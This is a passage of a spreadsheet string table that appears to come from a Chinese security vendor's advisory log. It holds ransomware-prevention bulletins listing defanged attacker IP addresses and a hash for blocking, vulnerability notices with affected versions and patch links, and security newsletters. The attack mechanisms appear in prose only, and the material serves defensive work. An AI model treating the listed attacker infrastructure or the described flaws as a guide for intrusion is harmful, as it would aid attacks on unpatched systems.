  </si>
  <si>
    <t>V25103006307</t>
  </si>
  <si>
    <t>172.16.5.13、172.16.5.20、192.168.1.101、192.168.1.102、192.168.1.110、172.20.34.100</t>
  </si>
  <si>
    <t>1. 影响组件：Apache-Tomcat   影响范围：8.5.6 ≤ Apache-Tomcat ≤ 8.5.100
9.0.0.M11 ≤ Apache-Tomcat ≤ 9.0.108
10.1.0-M1 ≤ Apache-Tomcat ≤ 10.1.44
11.0.0-M1 ≤ Apache-Tomcat ≤ 11.0.10</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251031</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251031】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
156.234.251[.]15
103.44.90[.]85
156.234.218[.]36
103.41.7[.]129
156.234.218[.]35</t>
  </si>
  <si>
    <t>V25103120321</t>
  </si>
  <si>
    <t>103.41.7.129、156.234.218.36、156.234.218.35、156.234.251.15、103.44.90.85</t>
  </si>
  <si>
    <t>Docker Compose OCI路径遍历漏洞 CVE-2025-62725</t>
  </si>
  <si>
    <t>官方已发布新版本修复该漏洞，建议您更新Docker Compose到2.40.2版本，完成漏洞的修复。
下载链接：https://github.com/docker/compose/releases</t>
  </si>
  <si>
    <t>Docker Compose对远程OCI artifacts缺乏校验，未经授权的攻击者可以构造恶意OCI，诱导用户运行Docker Compose命令（只读命令同样受影响）触发该漏洞，写入恶意文件，导致服务器失陷。</t>
  </si>
  <si>
    <t>V25103128026</t>
  </si>
  <si>
    <t>1. 影响组件：Docker Compose   影响范围：Docker Compose &lt; 2.40.2</t>
  </si>
  <si>
    <t>2025-10-31 16:10:50</t>
  </si>
  <si>
    <t>1天14时10分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251106</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251106】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
43.249.172[.]122
156.234.94[.]52
156.234.48[.]43
156.234.48[.]41
103.48.133[.]126
103.41.7[.]133
103.48.133[.]125
156.234.218[.]43</t>
  </si>
  <si>
    <t>V25110607004</t>
  </si>
  <si>
    <t>103.41.7.133、156.234.94.52、43.249.172.122、156.234.218.43、103.48.133.126、103.48.133.125、156.234.48.41、156.234.48.43</t>
  </si>
  <si>
    <t>2025-12-11 08:56:50</t>
  </si>
  <si>
    <t>28天18时26分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251107</t>
  </si>
  <si>
    <t xml:space="preserve">【勒索预防情报速递_20251107】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
156.234.247[.]98
103.44.90[.]90
23.248.192[.]100  </t>
  </si>
  <si>
    <t>V25110710556</t>
  </si>
  <si>
    <t>156.234.247.98、23.248.192.100、103.44.90.90</t>
  </si>
  <si>
    <t>10月份（下半月刊）安全通告_2025</t>
  </si>
  <si>
    <t xml:space="preserve">通告涵盖10月份（下半月刊）新增安全漏洞和安全事件的分析等。整理的具体内容包含以下几个方面：
一、 网络安全政策法律动态
（一）国内政策热点
1、全国人大常委会关于修改《中华人民共和国网络安全法》的决定
2、国家能源局印发《关于加强用户侧涉网安全管理的通知》
3、网络安全法修正草案将二审：增加人工智能安全与发展相关规定
（二）国际政策热点
1、美国空军ACESO计划推动网络战与安全技术开发
2、乌克兰国防部采用新的信息系统网络安全标准
3、印度启动“遏制网络欺诈”计划        
二、安全热点时事资讯
（一）国内安全事件
1、网络谣言典型案例公布
2、工信部：关于防范SEO投毒攻击的风险提示；
3、江西某公司因未履行网络安全保护义务被罚
（二） 国际安全事件
1、无印良品因物流合作伙伴遭勒索攻击关停线上销售
2、Medusa 组织泄露 Comcast 834GB 数据
3、汇丰银行疑遭黑客入侵，美国客户与财务数据或大规模泄露
三、安全风险通告
（一） 7-Zip 目录遍历导致任意代码执行漏洞
（二） Spring Cloud Gateway SpEL 表达式注入漏洞
（三） Windows 服务器更新服务 (WSUS) 远程代码执行漏洞        
（四） Apache Tomcat RewriteValve 目录遍历漏洞
（五） Docker Compose OCI 路径遍历漏洞        
四、10月份CNVD漏洞收录情况
（一） 漏洞分类统计        
（二） 漏洞被关注情况
（三） 漏洞趋势
附录：10月份重要漏洞信息汇总        </t>
  </si>
  <si>
    <t>V25111206520</t>
  </si>
  <si>
    <t>2025-11-12 09:52:15</t>
  </si>
  <si>
    <t>0天19时51分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251112</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251112】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
193.143.1[.]153
156.234.247[.]108
156.234.247[.]107
156.234.247[.]105
156.234.247[.]103
103.41.7[.]150
103.54.61[.]47</t>
  </si>
  <si>
    <t>V25111215246</t>
  </si>
  <si>
    <t>103.54.61.47、156.234.247.108、103.41.7.150、156.234.247.103、193.143.1.153、156.234.247.107、156.234.247.105</t>
  </si>
  <si>
    <t>微软补丁日安全通告|11月份_2025</t>
  </si>
  <si>
    <t>【漏洞详情】
【GDI 远程执行代码漏洞 CVE-2025-60724】
图形设备接口GDI是 Windows 操作系统中用于图形与文本输出的核心子系统。它负责在显示器、打印机等设备上绘制图形元素，如线条、矩形、字体、位图和图标等。GDI 通过提供设备无关的绘图接口，使应用程序无需直接操作硬件即可完成绘制任务，从而保证不同设备间的显示一致性。
其中存在远程执行代码漏洞，攻击者可以利用该漏洞在目标系统执行任意代码。经过评估危害较大，我们建议用户及时更新微软安全补丁。
【Windows 内核特权提升漏洞 CVE-2025-62215】
Windows 内核是 Windows 操作系统的核心组件，负责管理系统的基本资源和底层运行机制。它处于用户模式与硬件之间，承担进程调度、内存管理、设备驱动、文件系统访问、安全控制及中断处理等关键任务。其核心模块包括内核模式执行体、硬件抽象层和内核对象管理机制。
其中存在权限提升漏洞，攻击者可以利用该漏洞在目标系统获取更高的权限。经过评估，该漏洞存在在野利用，危害比较大，我们建议用户及时更新微软安全补丁。
官方解决方案：
微软官方已更新受影响软件的安全补丁，用户可根据不同系统版本下载安装对应的安全补丁，安全更新链接如下：
1.https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60724
2.https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62215</t>
  </si>
  <si>
    <t>V25111307407</t>
  </si>
  <si>
    <t>2025-11-13 10:08:55</t>
  </si>
  <si>
    <t>0天19时6分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251114</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251114】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
156.234.162[.]36
103.44.88[.]12
103.44.88[.]6
103.44.88[.]5
103.44.88[.]2</t>
  </si>
  <si>
    <t>V25111406748</t>
  </si>
  <si>
    <t>103.44.88.12、103.44.88.5、156.234.162.36、103.44.88.2、103.44.88.6</t>
  </si>
  <si>
    <t>2025-12-11 08:57:07</t>
  </si>
  <si>
    <t>19天22时37分</t>
  </si>
  <si>
    <t>东方通应用服务器Tongweb反序列化远程代码执行漏洞</t>
  </si>
  <si>
    <t>官方已发布补丁修复该漏洞，建议受影响用户更新以下补丁：
https://www.tongtech.com/dft/download.html</t>
  </si>
  <si>
    <t>东方通应用服务器 Tongweb 的 ejbserver 接口存在反序列化漏洞，未授权的攻击者可以利用默认开启的ejb服务传入恶意序列化数据，执行任意代码导致服务器失陷。</t>
  </si>
  <si>
    <t>V25111414731</t>
  </si>
  <si>
    <t>1. 影响组件：东方通-TongWeb   影响范围：7.0.0.0 ≤ TongWeb ≤ 7.0.4.9_M9
6.1.8.13 ≤ TongWeb ≤ 6.1.7.0</t>
  </si>
  <si>
    <t>2025-11-14 15:22:33</t>
  </si>
  <si>
    <t>1天7时34分</t>
  </si>
  <si>
    <t>FortiWeb 路径遍历漏洞CVE-2025-64446</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将FortiWeb更新到最新版本。
参考链接：https://fortiguard.fortinet.com/psirt/FG-IR-25-910</t>
  </si>
  <si>
    <t>FortiWeb 存在路径遍历漏洞，部分 CGI 接口访问控制存在缺陷，攻击者无需进行身份验证，也无需伪造 HTTP 头，仅通过构造特定的 HTTP/HTTPS 请求即可实现目录遍历。借助该漏洞，攻击者可执行创建后门账户、操控设备配置等任意管理命令，最终完全接管受影响设备，进而可能导致企业核心数据泄露、业务中断。目前该漏洞已被发现存在在野利用情况。</t>
  </si>
  <si>
    <t>V25111806675</t>
  </si>
  <si>
    <t>1. 影响组件：FortiWeb   影响范围：8.0.0 ≤ FortiWeb ≤ 8.0.1
7.6.0 ≤ FortiWeb ≤ 7.6.4
7.4.0 ≤ FortiWeb ≤ 7.4.9
7.2.0 ≤ FortiWeb ≤ 7.2.11
7.0.0 ≤ FortiWeb ≤ 7.0.11</t>
  </si>
  <si>
    <t>2025-11-18 10:01:50</t>
  </si>
  <si>
    <t>1天2时40分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251119</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251119】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
103.44.88[.]17
185.213.60[.]47
156.234.94[.]193</t>
  </si>
  <si>
    <t>V25111909813</t>
  </si>
  <si>
    <t>185.213.60.47、103.44.88.17、156.234.94.193</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251121</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251121】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
43.249.175[.]74
23.235.172[.]2
156.234.94[.]206
156.234.101[.]164</t>
  </si>
  <si>
    <t>V25112107168</t>
  </si>
  <si>
    <t>23.235.172.2、43.249.175.74、156.234.94.206、156.234.101.164</t>
  </si>
  <si>
    <t>2025-12-11 08:57:28</t>
  </si>
  <si>
    <t>0天17时36分</t>
  </si>
  <si>
    <t>11月份（上半月刊）安全通告_2025</t>
  </si>
  <si>
    <t>通告涵盖11月份（上半月刊）新增安全漏洞和安全事件的分析等。整理的具体内容包含以下几个方面：
一、 网络安全政策法律动态        
（一）国内政策热点         
1、第二批次网络安全保险服务试点工作启动        
2、国产操作系统安全基线手册式发布        
（二）国际政策热点        
1、英国关基保护法案启动立法程序：亮点初解析        
2、美国防部正式强制实施国防供应商网络安全合规要求        
二、安全热点时事资讯        
（一）国内安全事件        
1、国家网络安全通报中心公布一批境外恶意网址和恶意IP        
2、护网—2025丨某科技公司未及时修复安全漏洞，网警依法处罚        
（二） 国际安全事件        
1、韩国现代汽车集团IT服务子公司泄露270万车主个人敏感信息        
2、美国制造巨头Gemini集团遭勒索攻击，约2TB敏感数据在暗网泄露        
三、安全风险通告        
（一） 东方通应用服务器Tongweb反序列化远程代码执行漏洞        
四、微软安全通告        
（一） 漏洞概要        
（二） 漏洞数据分析        
1、 漏洞数量趋势        
2、 历史微软补丁日11月漏洞对比        
3、 漏洞数量分析        
（三） 重要漏洞分析        
1、 漏洞分析        
2、 影响范围        
3、 修复建议</t>
  </si>
  <si>
    <t>V25112612522</t>
  </si>
  <si>
    <t>2025-11-26 15:00:54</t>
  </si>
  <si>
    <t>0天19时8分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251127</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251127】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【检测结果】：查询近一个月流量未发现外联资产
【IOC详情】
156.234.121[.]161
156.234.121[.]164
156.234.254[.]135
156.234.254[.]133
156.234.254[.]129
23.235.172[.]24
156.234.121[.]171</t>
  </si>
  <si>
    <t>V25112706804</t>
  </si>
  <si>
    <t>23.235.172.24、156.234.121.171、156.234.121.161、156.234.121.164、156.234.254.135、156.234.254.133、156.234.254.129</t>
  </si>
  <si>
    <t>GeoServer XML外部实体注入漏洞CVE-2025-58360</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将GeoServe更新到最新版本。
参考链接：https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525</t>
  </si>
  <si>
    <t>GeoServer 存在XML外部实体注入漏洞，攻击者可通过 WMS（Web Map Service）服务的 GetMap 接口，构造恶意 XML 请求触发漏洞，实现读取服务器任意文件、发起服务端请求伪造等攻击。</t>
  </si>
  <si>
    <t>V25112714308</t>
  </si>
  <si>
    <t>1. 影响组件：GeoServer   影响范围：GeoServer &lt; 2.25.6
2.26.0 ≤ GeoServer &lt; 2.26.2</t>
  </si>
  <si>
    <t>2025-11-27 14:50:04</t>
  </si>
  <si>
    <t>1天7时33分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251201</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251201】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【检测结果】：查询近一个月流量未发现外联资产
【IOC详情】
43.249.175[.]80
23.248.205[.]105
23.235.172[.]18
23.235.172[.]28
185.213.60[.]36
156.234.94[.]219
156.234.94[.]217
23.226.48[.]198
156.234.121[.]186
156.234.121[.]185</t>
  </si>
  <si>
    <t>V25120106366</t>
  </si>
  <si>
    <t>156.234.94.217、23.226.48.198、23.235.172.28、156.234.121.185、156.234.94.219、156.234.121.186、185.213.60.36、23.248.205.105、23.235.172.18、43.249.175.80</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251203</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251203】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【检测结果】：查询近一个月流量未发现外联资产
【IOC详情】
23.235.163[.]194
23.235.172[.]30
23.226.55[.]78</t>
  </si>
  <si>
    <t>V25120308451</t>
  </si>
  <si>
    <t>23.235.172.30、23.235.163.194、23.226.55.78</t>
  </si>
  <si>
    <t>React/Next.js远程命令执行漏洞 CVE-2025-55182/CVE-2025-66478</t>
  </si>
  <si>
    <t>React官方已发布最新版本修复该漏洞，请受影响用户更新到以下版本：
React 19.0.1
React 19.1.2
React 19.2.1
升级命令：
npm install react@latest react-dom@latest
参考链接：https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components</t>
  </si>
  <si>
    <t>React Server Components 存在远程命令执行漏洞，该漏洞对 React 19 版本及基于该版本的相关框架均构成威胁，其中 Next.js 已对应产生衍生漏洞（CVE-2025-66478）。该漏洞在于对不受信任输入的处理逻辑存在缺陷，采用受影响版本 React 服务器组件开发的应用，可能被攻击者利用该缺陷实现远程命令执行。以下三个核心软件包的 19.0.0、19.1.0、19.1.1 及 19.2.0 版本均存在该漏洞：react-server-dom-parcel、react-server-dom-webpack、react-server-dom-turbopack。</t>
  </si>
  <si>
    <t>V25120413788</t>
  </si>
  <si>
    <t xml:space="preserve">1. 影响组件：React   影响范围：React 19.0.0
React 19.1.0
React 19.1.1
React 19.2.0
Next.js 15.x
Next.js 16.x
Next.js 14.3.0-canary.77及后续canary版本
</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251205</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251205】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织利用React/Next.js远程命令执行漏洞等高危漏洞面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。相关hash值录入EDR特征库识别。
【IOC详情】
ip地址：
156.234.209[.]97
103.41.6[.]45
23.235.163[.]205
103.41.6[.]35
156.234.209[.]103
hash：
b875965a7783f09d5e640e37576f0b89</t>
  </si>
  <si>
    <t>V25120510909</t>
  </si>
  <si>
    <t>103.41.6.35、156.234.209.103、156.234.209.97、103.41.6.45、23.235.163.205、b875965a7783f09d5e640e37576f0b89</t>
  </si>
  <si>
    <t>11月份（下半月刊）安全通告_2025</t>
  </si>
  <si>
    <t>通告涵盖11月份（下半月刊）新增安全漏洞和安全事件的分析等。整理的具体内容包含以下几个方面：
一、 网络安全政策法律动态        
（一）国内政策热点        
1、国务院办公厅印发《电子印章管理办法》，要求筑牢电子印章应用安全防线        
2、国家网信办、公安部联合起草的《大型网络平台个人信息保护规定（征求意见稿）》公开征求意见        
3、工信部印发《高标准数字园区建设指南》，要求统筹发展与安全        
工信部印发《高标准数字园区建设指南》        
（二）国际政策热点        
1、英国政府投资2100万英镑支持硬件层面阻挡网络攻击的新技术        
2、欧盟迫使苹果采用新WiFi标准，安卓手机也能用AirDrop
3、美国海军已授予一项合同，旨在对空中系统的网络安全供应链进行全面监控        
二、安全热点时事资讯         
（一）国内安全事件        
1、河南某公司信息服务平台遭网攻篡改，公安机关依法责令其整改        
2、陕西某公司涉无人机管理平台遭攻击导致数据泄露被罚        
3、标书电脑竟成泄密入口？海南警方破获亿元级商业秘密大案！        
（二）国际安全事件        
1、世界顶尖学府又因钓鱼攻击陷数据泄露危机        
2、一个漏洞引爆SaaS供应链，200余家企业客户数据遭窃        
3、Cloudflare全球宕机：多国网络瘫痪、主流在线服务大面积受影响        
4、员工遭社工诈骗致平台数据泄露，美国外卖平台 DoorDash 用户信息失窃        
三、安全风险通告        
（一）FortiWeb 路径遍历漏洞(CVE-2025-64446)        
（二）GeoServer XML外部实体注入漏洞(CVE-2025-58360)        
四、11月份CNVD漏洞收录情况        
（一） 漏洞分类统计        
（二） 漏洞被关注情况        
（三） 漏洞趋势
附录：11月份重要漏洞信息汇总</t>
  </si>
  <si>
    <t>V25120911616</t>
  </si>
  <si>
    <t>2025-12-09 14:34:58</t>
  </si>
  <si>
    <t>0天20时13分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251210</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251210】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
185.213.60[.]61
103.48.135[.]193
103.41.6[.]53
43.243.191[.]225
156.234.251[.]6</t>
  </si>
  <si>
    <t>V25121007999</t>
  </si>
  <si>
    <t>185.213.60.61、43.243.191.225、103.41.6.53、156.234.251.6、103.48.135.193</t>
  </si>
  <si>
    <t>SAP Solution Manager 代码注入漏洞CVE-2025-42880</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户更新到最新版本。
参考链接：https://support.sap.com/en/my-support/knowledge-base/security-notes-news/december-2025.html</t>
  </si>
  <si>
    <t>SAP Solution Manager 存在代码注入漏洞。该漏洞由于未对输入数据进行有效验证，允许已认证攻击者在调用系统远程启用的函数模块时，恶意插入非法代码。一旦漏洞被成功利用，攻击者可获取目标系统的完全控制权，导致企业系统的保密性、完整性和可用性被彻底破坏，对企业安全构成严重威胁。</t>
  </si>
  <si>
    <t>V25121015810</t>
  </si>
  <si>
    <t>1. 影响组件：SAP-Solution-Manager   影响范围：SAP Solution Manager = ST 720</t>
  </si>
  <si>
    <t>2025-12-10 15:01:48</t>
  </si>
  <si>
    <t>1天21时40分</t>
  </si>
  <si>
    <t>微软补丁日安全通告|12月份_2025</t>
  </si>
  <si>
    <t>【漏洞详情】
【Windows Cloud Files Mini Filter Driver特权提升漏洞 CVE-2025-62221】
Windows Cloud Files Mini Filter Driver是 Windows 用于支持云端文件占用空间优化与按需同步的核心驱动组件。它在文件系统层拦截并管理对云托管文件的访问，实现占位符文件、按需下载和节省空间的卸载等功能。应用程序看到的文件与本地文件系统无异，而驱动会在访问时与云提供方的服务协调，动态获取或释放数据。
其中存在特权提升漏洞，攻击者可以利用该漏洞在目标系统上获取更高的用户权限。该漏洞存在在野利用，经过评估，危害比较大，我们建议用户及时更新微软安全补丁。
【Microsoft Office 远程执行代码漏洞 CVE-2025-62554】
Microsoft Office是由微软公司开发的办公软件套装，包含Word, Excel, PowerPoint等办公工具。
其中存在远程代码执行漏洞，攻击者可以利用该漏洞在目标系统执行任意代码。该漏洞经过评估，危害比较大，我们建议用户及时更新微软安全补丁。
官方解决方案：
微软官方已更新受影响软件的安全补丁，用户可根据不同系统版本下载安装对应的安全补丁，安全更新链接如下：
1.https://msrc.microsoft.com/update-guide/advisory/CVE-2025-62221
2.https://msrc.microsoft.com/update-guide/advisory/CVE-2025-62554</t>
  </si>
  <si>
    <t>V25121021169</t>
  </si>
  <si>
    <t>2025-12-10 15:43:06</t>
  </si>
  <si>
    <t>0天20时57分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251212</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251212】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
43.243.191[.]237
156.234.67[.]161
156.234.251[.]12</t>
  </si>
  <si>
    <t>V25121207294</t>
  </si>
  <si>
    <t>43.243.191.237、156.234.251.12、156.234.67.161</t>
  </si>
  <si>
    <t>2026-01-15 16:07:58</t>
  </si>
  <si>
    <t>0天0时47分</t>
  </si>
  <si>
    <t>Fortinet 多产品漏洞身份验证绕过漏洞CVE-2025-59718</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户更新到最新版本。
参考链接：https://www.fortiguard.com/psirt/FG-IR-25-647</t>
  </si>
  <si>
    <t>Fortinet 多产品加密签名验证不当，允许未经身份验证的攻击者通过特制的SAML响应消息绕过FortiCloud SSO登录身份验证，导致服务器失陷。</t>
  </si>
  <si>
    <t>V25121215743</t>
  </si>
  <si>
    <t>1. 影响组件：Fortinet FortiOS   影响范围：7.6.0 ≤ FortiOS ≤ 7.6.3
7.4.0 ≤ FortiOS ≤ 7.4.8
7.2.0 ≤ FortiOS ≤ 7.2.11
7.0.0 ≤ FortiOS ≤ 7.0.17
7.6.0 ≤ FortiProxy ≤ 7.6.3
7.4.0 ≤ FortiProxy ≤ 7.4.10
7.2.0 ≤ FortiProxy ≤ 7.2.14
7.0.0 ≤ FortiProxy ≤ 7.0.21
7.2.0 ≤ FortiSwitchManager ≤ 7.2.6
7.0.0 ≤ FortiSwitchManager ≤ 7.0.5
FortiWeb 8.0.0
7.6.0 ≤ FortiWeb ≤ 7.6.4
7.4.0 ≤ FortiWeb ≤ 7.4.9</t>
  </si>
  <si>
    <t>2025-12-12 15:54:03</t>
  </si>
  <si>
    <t>1天0时32分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251216</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251216】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
156.234.251[.]27
156.234.251[.]22
156.234.67[.]176
156.234.209[.]35
156.234.209[.]38
23.248.197[.]166</t>
  </si>
  <si>
    <t>V25121606293</t>
  </si>
  <si>
    <t>156.234.251.27、156.234.251.22、156.234.67.176、156.234.209.38、156.234.209.35、23.248.197.166</t>
  </si>
  <si>
    <t>frp是一款用于内网穿透的反向代理应用，它会把内网终端或服务器暴露给外网服务器，可以通过外网直接进行访问。造成攻击者可以直接从外网直接进入到内网进行操作，是攻击者进入内网进行内网攻击的常用攻击手段</t>
  </si>
  <si>
    <t>帆软 FineReport SQL注入漏洞</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户更新到安全版本：
FineReport 11.5.4.1及以上版本
FineBI 7.0.5及以上版本
FineBI 6.1.8及以上版本
FineBI 6.0.24及以上版本
FineDataLink 5.0.4.3及以上版本
FineDataLink 4.2.11.3及以上版本
参考链接：https://help.fanruan.com/finereport/doc-view-4833.html</t>
  </si>
  <si>
    <t>帆软 FineReport 存在SQL注入漏洞，攻击者可通过export/excel接口构造恶意的SQL代码，通过导出文件写入Webshell，进而获取服务器权限。</t>
  </si>
  <si>
    <t>V25121707021</t>
  </si>
  <si>
    <t>1. 影响组件：帆软-FineReport   影响范围：FineReport &lt; 11.5.4.1
FineBi &lt; 7.0.5
FineBi &lt; 6.1.8
FineDataLink &lt; 5.0.4.3
FineDataLink &lt; 4.2.11.3</t>
  </si>
  <si>
    <t>2025-12-17 10:33:54</t>
  </si>
  <si>
    <t>1天4时8分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251219</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251219】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
156.234.209[.]54
156.234.67[.]183
156.234.251[.]30</t>
  </si>
  <si>
    <t>V25121912082</t>
  </si>
  <si>
    <t>156.234.251.30、156.234.67.183、156.234.209.54</t>
  </si>
  <si>
    <t>12月份（上半月刊）安全通告_2025</t>
  </si>
  <si>
    <t>通告涵盖12月份（上半月刊）新增安全漏洞和安全事件的分析等。整理的具体内容包含以下几个方面：
一、 网络安全政策法律动态
（一）国内政策热点
1、习近平总书记引领推动构建网络空间命运共同体
2、民航局出台意见，推动“人工智能+民航”深度融合创新
3、《网络安全技术、区块链共识机制安全要求（征求意见稿）》等 6 项国家标准公开意见
4、《网络数据安全风险评估办法（征求意见稿）》公开征求意见
（二）国际政策热点
1、印度电信部（DoT）要求智能手机统一安装国产反诈安全软件
2、美国新版国家安全战略简述网络安全指导方针
3、美国空军将在基地和基础设施工控系统实施零信任网络安全
4、在发展中筑牢防线：澳大利亚发布《国家人工智能计划》
二、安全热点时事资讯 
（一）国内安全事件
1、利用“AI 换脸”技术绕过验证的入侵案告破，企业安全警钟再鸣
2、华硕确认供应商遭黑客攻击，致部分手机摄像头源代码泄露
3、管理平台被入侵，辽宁一单位因未落实数据安全保护义务遭行政处罚 
（二）国际安全事件
1、短信钓鱼攻破供应链，OpenAI 用户元数据被窃
2、韩国爆出史上最大规模数据泄露，电商巨头 3370 万用户数据遭前员工窃取
3、英国 Barts Health 医疗集团数据库遭 Clop 勒索组织入侵，多年收费信息被泄露
4、新型勒索软件正攻击安卓用户，可远程锁死手机并勒索赎金
三、安全风险通告
（一）React/Next.js 远程命令执行漏洞（CVE-2025-55182/CVE-2025-66478）
（二）SAP Solution Manager 代码注入漏洞（CVE-2025-42880）
（三）Fortinet 多产品身份验证绕过漏洞（CVE-2025-59718）
四、微软安全通告
（一） 漏洞概要
（二） 漏洞数据分析
（三） 重要漏洞分析</t>
  </si>
  <si>
    <t>V25122310671</t>
  </si>
  <si>
    <t>2025-12-23 15:06:44</t>
  </si>
  <si>
    <t>1天15时6分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251224</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251224】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
23.235.173[.]5
23.248.197[.]171
156.234.74[.]229
156.234.74[.]234
23.235.173[.]18</t>
  </si>
  <si>
    <t>V25122406015</t>
  </si>
  <si>
    <t>23.235.173.5、23.235.173.18、156.234.74.229、23.248.197.171、156.234.74.234</t>
  </si>
  <si>
    <t>n8n 远程代码执行漏洞CVE-2025-68613</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户更新到最新版本。
n8n 1.120.* ≥ 1.120.4
n8n 1.121.* ≥ 1.121.1
n8n 1.122.* ≥ 1.122.0
下载链接：https://github.com/n8n-io/n8n/releases</t>
  </si>
  <si>
    <t>n8n 工作流自动化平台存在远程代码执行漏洞，已认证用户在配置工作流时提交的表达式，会在未与底层运行时充分隔离的执行环境中被解析执行，攻击者可借此以 n8n 进程权限执行任意代码，进而完全控制受影响实例，引发敏感数据泄露、工作流被篡改、系统级操作被非法执行等严重安全后果。</t>
  </si>
  <si>
    <t>V25122415275</t>
  </si>
  <si>
    <t>1. 影响组件：n8n工作流自动化平台   影响范围：0.211.0 ≤ n8n &lt; 1.120.4
n8n &lt; 1.121.1
n8n &lt; 1.122.0</t>
  </si>
  <si>
    <t>2025-12-24 16:08:17</t>
  </si>
  <si>
    <t>0天23时31分</t>
  </si>
  <si>
    <t>Minepool是一种加密货币挖矿池，该矿池可挖掘比特币，科莫多，Litecoinz，Snowgem和Votecoin等多种货币，它可以通过组建一组协作的矿工来运作，利用其他挖矿病毒进行挖矿相关任务、SqlServer是常见的数据库服务，攻击者通过工具构造出常见的用户名密码尝试登陆数据库，获取敏感数据</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251226</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251226】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
23.235.173[.]26
43.243.191[.]246</t>
  </si>
  <si>
    <t>V25122611830</t>
  </si>
  <si>
    <t>23.235.173.26、43.243.191.246</t>
  </si>
  <si>
